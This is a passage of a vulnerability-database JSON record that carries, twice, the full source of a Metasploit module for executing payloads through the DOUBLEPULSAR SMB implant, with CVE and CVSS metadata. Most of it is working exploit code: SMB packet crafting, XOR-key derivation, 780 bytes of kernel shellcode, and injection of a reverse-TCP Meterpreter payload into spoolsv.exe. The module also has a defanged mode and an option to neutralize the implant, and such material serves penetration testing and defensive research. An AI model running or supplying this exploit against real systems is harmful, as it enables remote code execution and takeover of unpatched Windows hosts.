"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:19:07", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-11T22:19:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-13] #"}, "lastseen": "2021-09-12T22:15:25", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1a3c5772bfefd9ec2aef9074df62d931", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-13T22:19:18", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42031", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-13T22:19:18", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-13T22:19:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # 